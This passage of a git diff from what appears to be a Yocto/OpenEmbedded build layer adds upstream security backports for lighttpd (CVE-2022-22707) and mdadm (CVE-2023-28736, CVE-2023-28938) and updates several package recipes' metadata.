143 | + if (sz > chunk_buffer_string_space(b)) { | ||
144 | + sz += b->used ? b->used : 1; | ||
145 | + buffer * const cb = chunk_buffer_acquire_sz(sz); | ||
146 | + /* swap buffer contents and copy original b->ptr into larger b->ptr */ | ||
147 | + /*(this does more than buffer_move())*/ | ||
148 | + buffer tb = *b; | ||
149 | + *b = *cb; | ||
150 | + *cb = tb; | ||
151 | + if ((b->used = tb.used)) | ||
152 | + memcpy(b->ptr, tb.ptr, tb.used); | ||
153 | + chunk_buffer_release(cb); | ||
154 | + } | ||
155 | + return chunk_buffer_string_space(b); | ||
156 | +} | ||
157 | + | ||
158 | static chunk * chunk_acquire(size_t sz) { | ||
159 | if (sz <= chunk_buf_sz) { | ||
160 | if (chunks) { | ||
161 | @@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { | ||
162 | sz = chunk_buf_sz; | ||
163 | } | ||
164 | else { | ||
165 | - sz = (sz + 8191) & ~8191uL; | ||
166 | - /* future: might have buckets of certain sizes, up to socket buf sizes*/ | ||
167 | - if (chunks_oversized && chunks_oversized->mem->size >= sz) { | ||
168 | - chunk *c = chunks_oversized; | ||
169 | - chunks_oversized = c->next; | ||
170 | - return c; | ||
171 | - } | ||
172 | + /*(round up to nearest chunk_buf_sz)*/ | ||
173 | + sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); | ||
174 | + chunk *c = chunk_pop_oversized(sz); | ||
175 | + if (c) return c; | ||
176 | } | ||
177 | |||
178 | return chunk_init(sz); | ||
179 | @@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { | ||
180 | } | ||
181 | else if (sz > chunk_buf_sz) { | ||
182 | chunk_reset(c); | ||
183 | - chunk **co = &chunks_oversized; | ||
184 | - while (*co && sz < (*co)->mem->size) co = &(*co)->next; | ||
185 | - c->next = *co; | ||
186 | - *co = c; | ||
187 | + chunk_push_oversized(c, sz); | ||
188 | } | ||
189 | else { | ||
190 | chunk_free(c); | ||
191 | @@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) | ||
192 | chunk_free(c); | ||
193 | } | ||
194 | chunks_oversized = NULL; | ||
195 | + chunks_oversized_n = 0; | ||
196 | } | ||
197 | |||
198 | void chunkqueue_chunk_pool_free(void) | ||
199 | diff --git a/src/chunk.h b/src/chunk.h | ||
200 | index 4c6b7e4..93f343c 100644 | ||
201 | --- a/src/chunk.h | ||
202 | +++ b/src/chunk.h | ||
203 | @@ -50,6 +50,8 @@ typedef struct { | ||
204 | buffer * chunk_buffer_acquire(void); | ||
205 | void chunk_buffer_release(buffer *b); | ||
206 | |||
207 | +size_t chunk_buffer_prepare_append (buffer *b, size_t sz); | ||
208 | + | ||
209 | void chunkqueue_chunk_pool_clear(void); | ||
210 | void chunkqueue_chunk_pool_free(void); | ||
211 | |||
212 | diff --git a/src/http-header-glue.c b/src/http-header-glue.c | ||
213 | index d54f00c..2231fba 100644 | ||
214 | --- a/src/http-header-glue.c | ||
215 | +++ b/src/http-header-glue.c | ||
216 | @@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o | ||
217 | if (avail < toread) { | ||
218 | /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ | ||
219 | avail = avail ? avail - 1 + toread : toread; | ||
220 | - buffer_string_prepare_append(b, avail); | ||
221 | + avail = chunk_buffer_prepare_append(b, avail); | ||
222 | } | ||
223 | |||
224 | n = read(fd, b->ptr+buffer_string_length(b), avail); | ||
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch new file mode 100644 index 0000000000..da59b7297a --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch | |||
@@ -0,0 +1,100 @@ | |||
1 | From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001 | ||
2 | From: povcfe <povcfe@qq.com> | ||
3 | Date: Wed, 5 Jan 2022 11:11:09 +0000 | ||
4 | Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134) | ||
5 | |||
6 | (thx povcfe) | ||
7 | |||
8 | (edited: gstrauss) | ||
9 | |||
10 | There is a potential remote denial of service in lighttpd mod_extforward | ||
11 | under specific, non-default and uncommon 32-bit lighttpd mod_extforward | ||
12 | configurations. | ||
13 | |||
14 | Under specific, non-default and uncommon lighttpd mod_extforward | ||
15 | configurations, a remote attacker can trigger a 4-byte out-of-bounds | ||
16 | write of value '-1' to the stack. This is not believed to be exploitable | ||
17 | in any way beyond triggering a crash of the lighttpd server on systems | ||
18 | where the lighttpd server has been built 32-bit and with compiler flags | ||
19 | which enable a stack canary -- gcc/clang -fstack-protector-strong or | ||
20 | -fstack-protector-all, but bug not visible with only -fstack-protector. | ||
21 | |||
22 | With standard lighttpd builds using -O2 optimization on 64-bit x86_64, | ||
23 | this bug has not been observed to cause adverse behavior, even with | ||
24 | gcc/clang -fstack-protector-strong. | ||
25 | |||
26 | For the bug to be reachable, the user must be using a non-default | ||
27 | lighttpd configuration which enables mod_extforward and configures | ||
28 | mod_extforward to accept and parse the "Forwarded" header from a trusted | ||
29 | proxy. At this time, support for RFC7239 Forwarded is not common in CDN | ||
30 | providers or popular web server reverse proxies. It bears repeating that | ||
31 | for the user to desire to configure lighttpd mod_extforward to accept | ||
32 | "Forwarded", the user must also be using a trusted proxy (in front of | ||
33 | lighttpd) which understands and actively modifies the "Forwarded" header | ||
34 | sent to lighttpd. | ||
35 | |||
36 | lighttpd natively supports RFC7239 "Forwarded" | ||
37 | hiawatha natively supports RFC7239 "Forwarded" | ||
38 | |||
39 | nginx can be manually configured to add a "Forwarded" header | ||
40 | https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/ | ||
41 | |||
42 | A 64-bit build of lighttpd on x86_64 (not known to be affected by bug) | ||
43 | in front of another 32-bit lighttpd will detect and reject a malicious | ||
44 | "Forwarded" request header, thereby thwarting an attempt to trigger | ||
45 | this bug in an upstream 32-bit lighttpd. | ||
46 | |||
47 | The following servers currently do not natively support RFC7239 Forwarded: | ||
48 | nginx | ||
49 | apache2 | ||
50 | caddy | ||
51 | node.js | ||
52 | haproxy | ||
53 | squid | ||
54 | varnish-cache | ||
55 | litespeed | ||
56 | |||
57 | Given the general dearth of support for RFC7239 Forwarded in popular | ||
58 | CDNs and web server reverse proxies, and given the prerequisites in | ||
59 | lighttpd mod_extforward needed to reach this bug, the number of lighttpd | ||
60 | servers vulnerable to this bug is estimated to be vanishingly small. | ||
61 | Large systems using reverse proxies are likely running 64-bit lighttpd, | ||
62 | which is not known to be adversely affected by this bug. | ||
63 | |||
64 | In the future, it is desirable for more servers to implement RFC7239 | ||
65 | Forwarded. lighttpd developers would like to thank povcfe for reporting | ||
66 | this bug so that it can be fixed before more CDNs and web servers | ||
67 | implement RFC7239 Forwarded. | ||
68 | |||
69 | x-ref: | ||
70 | "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1" | ||
71 | https://redmine.lighttpd.net/issues/3134 | ||
72 | (not yet written or published) | ||
73 | CVE-2022-22707 | ||
74 | |||
75 | Upstream-Status: Backport | ||
76 | CVE: CVE-2022-22707 | ||
77 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
78 | |||
79 | Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com> | ||
80 | Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com> | ||
81 | --- | ||
82 | src/mod_extforward.c | 2 +- | ||
83 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
84 | |||
85 | diff --git a/src/mod_extforward.c b/src/mod_extforward.c | ||
86 | index ba957e04..fdaef7f6 100644 | ||
87 | --- a/src/mod_extforward.c | ||
88 | +++ b/src/mod_extforward.c | ||
89 | @@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c | ||
90 | while (s[i] == ' ' || s[i] == '\t') ++i; | ||
91 | if (s[i] == ';') { ++i; continue; } | ||
92 | if (s[i] == ',') { | ||
93 | - if (j >= (int)(sizeof(offsets)/sizeof(int))) break; | ||
94 | + if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break; | ||
95 | offsets[++j] = -1; /*("offset" separating params from next proxy)*/ | ||
96 | ++i; | ||
97 | continue; | ||
98 | -- | ||
99 | 2.25.1 | ||
100 | |||
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch | |||
@@ -0,0 +1,35 @@ | |||
1 | From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 | ||
2 | From: Glenn Strauss <gstrauss@gluelogic.com> | ||
3 | Date: Fri, 29 Nov 2019 18:18:52 -0500 | ||
4 | Subject: [PATCH] default chunk size 8k (was 4k) | ||
5 | |||
6 | Upstream-Status: Backport | ||
7 | Comment: No hunk refreshed | ||
8 | https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 | ||
9 | Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> | ||
10 | --- | ||
11 | src/chunk.c | 4 ++-- | ||
12 | 1 file changed, 2 insertions(+), 2 deletions(-) | ||
13 | |||
14 | diff --git a/src/chunk.c b/src/chunk.c | ||
15 | index 09dd3f1..133308f 100644 | ||
16 | --- a/src/chunk.c | ||
17 | +++ b/src/chunk.c | ||
18 | @@ -25,7 +25,7 @@ | ||
19 | #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) | ||
20 | #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) | ||
21 | |||
22 | -static size_t chunk_buf_sz = 4096; | ||
23 | +static size_t chunk_buf_sz = 8192; | ||
24 | static chunk *chunks, *chunks_oversized; | ||
25 | static chunk *chunk_buffers; | ||
26 | static array *chunkqueue_default_tempdirs = NULL; | ||
27 | @@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
28 | |||
29 | void chunkqueue_set_chunk_size (size_t sz) | ||
30 | { | ||
31 | - chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; | ||
32 | + chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; | ||
33 | } | ||
34 | |||
35 | void chunkqueue_set_tempdirs_default_reset (void) | ||
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 7a255ce2f2..357a269015 100644 --- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Lightweight high-performance web server" | 1 | SUMMARY = "Lightweight high-performance web server" |
2 | HOMEPAGE = "http://www.lighttpd.net/" | 2 | HOMEPAGE = "http://www.lighttpd.net/" |
3 | DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)" | ||
3 | BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" | 4 | BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" |
4 | 5 | ||
5 | LICENSE = "BSD-3-Clause" | 6 | LICENSE = "BSD-3-Clause" |
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \ | |||
13 | lighttpd-module-accesslog" | 14 | lighttpd-module-accesslog" |
14 | 15 | ||
15 | SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ | 16 | SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ |
17 | file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \ | ||
16 | file://index.html.lighttpd \ | 18 | file://index.html.lighttpd \ |
17 | file://lighttpd.conf \ | 19 | file://lighttpd.conf \ |
18 | file://lighttpd \ | 20 | file://lighttpd \ |
19 | file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ | 21 | file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ |
22 | file://default-chunk-size-8k.patch \ | ||
23 | file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ | ||
20 | " | 24 | " |
21 | 25 | ||
22 | SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" | 26 | SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" |
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb index 17f4bf4617..7c1b77add8 100644 --- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb +++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Rotates, compresses, removes and mails system log files" | 1 | SUMMARY = "Rotates, compresses, removes and mails system log files" |
2 | SECTION = "console/utils" | 2 | SECTION = "console/utils" |
3 | HOMEPAGE = "https://github.com/logrotate/logrotate/issues" | 3 | HOMEPAGE = "https://github.com/logrotate/logrotate/" |
4 | DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files." | ||
4 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
5 | 6 | ||
6 | # TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? | 7 | # TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? |
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz | |||
21 | SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" | 22 | SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" |
22 | SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" | 23 | SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" |
23 | 24 | ||
25 | # These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used | ||
26 | CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550" | ||
27 | |||
24 | PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" | 28 | PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" |
25 | 29 | ||
26 | PACKAGECONFIG[acl] = ",,acl" | 30 | PACKAGECONFIG[acl] = ",,acl" |
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch new file mode 100644 index 0000000000..f32cd18370 --- /dev/null +++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch | |||
@@ -0,0 +1,27 @@ | |||
1 | lsb-release maintains it's own copy of help2man. Include the support | ||
2 | for specifying SOURCE_DATE_EPOCH from upstream. | ||
3 | |||
4 | Upstream-Status: Pending | ||
5 | |||
6 | Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> | ||
7 | |||
8 | diff --git a/help2man b/help2man | ||
9 | index 13015c2..63439db 100755 | ||
10 | --- a/help2man | ||
11 | +++ b/help2man | ||
12 | @@ -173,7 +173,14 @@ my ($help_text, $version_text) = map { | ||
13 | or die "$this_program: can't get `--$_' info from $ARGV[0]\n" | ||
14 | } qw(help), $opt_version_key; | ||
15 | |||
16 | -my $date = strftime "%B %Y", localtime; | ||
17 | +my $epoch_secs = time; | ||
18 | +if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/) | ||
19 | +{ | ||
20 | + $epoch_secs = $1; | ||
21 | + $ENV{TZ} = 'UTC0'; | ||
22 | +} | ||
23 | + | ||
24 | +my $date = strftime "%B %Y", localtime $epoch_secs; | ||
25 | (my $program = $ARGV[0]) =~ s!.*/!!; | ||
26 | my $package = $program; | ||
27 | my $version; | ||
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb index 3e8f7a13ec..bafc18fcc0 100644 --- a/meta/recipes-extended/lsb/lsb-release_1.4.bb +++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb | |||
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf" | |||
11 | SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \ | 11 | SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \ |
12 | file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \ | 12 | file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \ |
13 | file://0001-Remove-timestamp-from-manpage.patch \ | 13 | file://0001-Remove-timestamp-from-manpage.patch \ |
14 | file://help2man-reproducibility.patch \ | ||
14 | " | 15 | " |
15 | 16 | ||
16 | SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4" | 17 | SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4" |
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb index b3adfd57af..7c85bf23fc 100644 --- a/meta/recipes-extended/lsof/lsof_4.91.bb +++ b/meta/recipes-extended/lsof/lsof_4.91.bb | |||
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \ | |||
3 | Its name stands for LiSt Open Files, and it does just that." | 3 | Its name stands for LiSt Open Files, and it does just that." |
4 | HOMEPAGE = "http://people.freebsd.org/~abe/" | 4 | HOMEPAGE = "http://people.freebsd.org/~abe/" |
5 | SECTION = "devel" | 5 | SECTION = "devel" |
6 | LICENSE = "BSD" | 6 | LICENSE = "Spencer-94" |
7 | LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a" | 7 | LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a" |
8 | 8 | ||
9 | # Upstream lsof releases are hosted on an ftp server which times out download | 9 | # Upstream lsof releases are hosted on an ftp server which times out download |
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb index 6633755a20..505b7b14fc 100644 --- a/meta/recipes-extended/ltp/ltp_20200120.bb +++ b/meta/recipes-extended/ltp/ltp_20200120.bb | |||
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__" | |||
29 | CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" | 29 | CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" |
30 | SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" | 30 | SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" |
31 | 31 | ||
32 | SRC_URI = "git://github.com/linux-test-project/ltp.git \ | 32 | SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ |
33 | file://0001-build-Add-option-to-select-libc-implementation.patch \ | 33 | file://0001-build-Add-option-to-select-libc-implementation.patch \ |
34 | file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ | 34 | file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ |
35 | file://0004-guard-mallocopt-with-__GLIBC__.patch \ | 35 | file://0004-guard-mallocopt-with-__GLIBC__.patch \ |
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb index bb3d2a6fe3..bd1c007de6 100644 --- a/meta/recipes-extended/lzip/lzip_1.21.bb +++ b/meta/recipes-extended/lzip/lzip_1.21.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Lossless data compressor based on the LZMA algorithm" | 1 | SUMMARY = "Lossless data compressor based on the LZMA algorithm" |
2 | HOMEPAGE = "http://lzip.nongnu.org/lzip.html" | 2 | HOMEPAGE = "http://lzip.nongnu.org/lzip.html" |
3 | DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability." | ||
3 | SECTION = "console/utils" | 4 | SECTION = "console/utils" |
4 | LICENSE = "GPLv2+" | 5 | LICENSE = "GPLv2+" |
5 | LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \ | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \ |
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb index 333fbfa76d..7a30f9d722 100644 --- a/meta/recipes-extended/man-db/man-db_2.9.0.bb +++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command" | 1 | SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command" |
2 | HOMEPAGE = "http://man-db.nongnu.org/" | 2 | HOMEPAGE = "http://man-db.nongnu.org/" |
3 | DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases." | ||
3 | LICENSE = "LGPLv2.1 & GPLv2" | 4 | LICENSE = "LGPLv2.1 & GPLv2" |
4 | LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \ | 5 | LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \ |
5 | file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a" | 6 | file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a" |
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb index ead348b92e..8e3b7a65e0 100644 --- a/meta/recipes-extended/mc/mc_4.8.23.bb +++ b/meta/recipes-extended/mc/mc_4.8.23.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Midnight Commander is an ncurses based file manager" | 1 | SUMMARY = "Midnight Commander is an ncurses based file manager" |
2 | HOMEPAGE = "http://www.midnight-commander.org/" | 2 | HOMEPAGE = "http://www.midnight-commander.org/" |
3 | DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included." | ||
3 | LICENSE = "GPLv3" | 4 | LICENSE = "GPLv3" |
4 | LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2" | 5 | LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2" |
5 | SECTION = "console/utils" | 6 | SECTION = "console/utils" |
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch new file mode 100644 index 0000000000..8e0a06cbc7 --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch | |||
@@ -0,0 +1,77 @@ | |||
1 | From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001 | ||
2 | From: Blazej Kucman <blazej.kucman@intel.com> | ||
3 | Date: Fri, 3 Dec 2021 15:31:15 +0100 | ||
4 | Subject: mdadm: block creation with long names | ||
5 | |||
6 | This fixes buffer overflows in create_mddev(). It prohibits | ||
7 | creation with not supported names for DDF and native. For IMSM, | ||
8 | mdadm will do silent cut to 16 later. | ||
9 | |||
10 | Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com> | ||
11 | Signed-off-by: Blazej Kucman <blazej.kucman@intel.com> | ||
12 | Signed-off-by: Jes Sorensen <jsorensen@fb.com> | ||
13 | --- | ||
14 | |||
15 | Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce] | ||
16 | CVE: CVE-2023-28736 | ||
17 | Signed-off-by: Ashish Sharma <asharma@mvista.com> | ||
18 | |||
19 | mdadm.8.in | 5 +++++ | ||
20 | mdadm.c | 9 ++++++++- | ||
21 | mdadm.h | 5 +++++ | ||
22 | 3 files changed, 18 insertions(+), 1 deletion(-) | ||
23 | |||
24 | diff --git a/mdadm.8.in b/mdadm.8.in | ||
25 | index 28d773c2..68e100cb 100644 | ||
26 | --- a/mdadm.8.in | ||
27 | +++ b/mdadm.8.in | ||
28 | @@ -2186,6 +2186,11 @@ is run, but will be created by | ||
29 | .I udev | ||
30 | once the array becomes active. | ||
31 | |||
32 | +The max length md-device name is limited to 32 characters. | ||
33 | +Different metadata types have more strict limitation | ||
34 | +(like IMSM where only 16 characters are allowed). | ||
35 | +For that reason, long name could be truncated or rejected, it depends on metadata policy. | ||
36 | + | ||
37 | As devices are added, they are checked to see if they contain RAID | ||
38 | superblocks or filesystems. They are also checked to see if the variance in | ||
39 | device size exceeds 1%. | ||
40 | diff --git a/mdadm.c b/mdadm.c | ||
41 | index 91e67467..26299b2e 100644 | ||
42 | --- a/mdadm.c | ||
43 | +++ b/mdadm.c | ||
44 | @@ -1359,9 +1359,16 @@ int main(int argc, char *argv[]) | ||
45 | mdfd = open_mddev(devlist->devname, 1); | ||
46 | if (mdfd < 0) | ||
47 | exit(1); | ||
48 | - } else | ||
49 | + } else { | ||
50 | + char *bname = basename(devlist->devname); | ||
51 | + | ||
52 | + if (strlen(bname) > MD_NAME_MAX) { | ||
53 | + pr_err("Name %s is too long.\n", devlist->devname); | ||
54 | + exit(1); | ||
55 | + } | ||
56 | /* non-existent device is OK */ | ||
57 | mdfd = open_mddev(devlist->devname, 0); | ||
58 | + } | ||
59 | if (mdfd == -2) { | ||
60 | pr_err("device %s exists but is not an md array.\n", devlist->devname); | ||
61 | exit(1); | ||
62 | diff --git a/mdadm.h b/mdadm.h | ||
63 | index 54567396..c7268a71 100644 | ||
64 | --- a/mdadm.h | ||
65 | +++ b/mdadm.h | ||
66 | @@ -1880,3 +1880,8 @@ enum r0layout { | ||
67 | #define INVALID_SECTORS 1 | ||
68 | /* And another special number needed for --data_offset=variable */ | ||
69 | #define VARIABLE_OFFSET 3 | ||
70 | + | ||
71 | +/** | ||
72 | + * This is true for native and DDF, IMSM allows 16. | ||
73 | + */ | ||
74 | +#define MD_NAME_MAX 32 | ||
75 | -- | ||
76 | cgit | ||
77 | |||
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch new file mode 100644 index 0000000000..1e2990d79a --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch | |||
@@ -0,0 +1,80 @@ | |||
1 | From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001 | ||
2 | From: Mateusz Grzonka <mateusz.grzonka@intel.com> | ||
3 | Date: Tue, 27 Jul 2021 10:25:18 +0200 | ||
4 | Subject: Fix memory leak after "mdadm --detail" | ||
5 | |||
6 | Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com> | ||
7 | Signed-off-by: Jes Sorensen <jsorensen@fb.com> | ||
8 | --- | ||
9 | Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62] | ||
10 | CVE: CVE-2023-28938 | ||
11 | Signed-off-by: Ashish Sharma <asharma@mvista.com> | ||
12 | |||
13 | Detail.c | 20 +++++++++----------- | ||
14 | 1 file changed, 9 insertions(+), 11 deletions(-) | ||
15 | |||
16 | diff --git a/Detail.c b/Detail.c | ||
17 | index ad56344f..d3af0ab5 100644 | ||
18 | --- a/Detail.c | ||
19 | +++ b/Detail.c | ||
20 | @@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c) | ||
21 | int spares = 0; | ||
22 | struct stat stb; | ||
23 | int failed = 0; | ||
24 | - struct supertype *st; | ||
25 | + struct supertype *st = NULL; | ||
26 | char *subarray = NULL; | ||
27 | int max_disks = MD_SB_DISKS; /* just a default */ | ||
28 | struct mdinfo *info = NULL; | ||
29 | - struct mdinfo *sra; | ||
30 | + struct mdinfo *sra = NULL; | ||
31 | struct mdinfo *subdev; | ||
32 | char *member = NULL; | ||
33 | char *container = NULL; | ||
34 | @@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c) | ||
35 | if (!sra) { | ||
36 | if (md_get_array_info(fd, &array)) { | ||
37 | pr_err("%s does not appear to be an md device\n", dev); | ||
38 | - close(fd); | ||
39 | - return rv; | ||
40 | + goto out; | ||
41 | } | ||
42 | } | ||
43 | external = (sra != NULL && sra->array.major_version == -1 && | ||
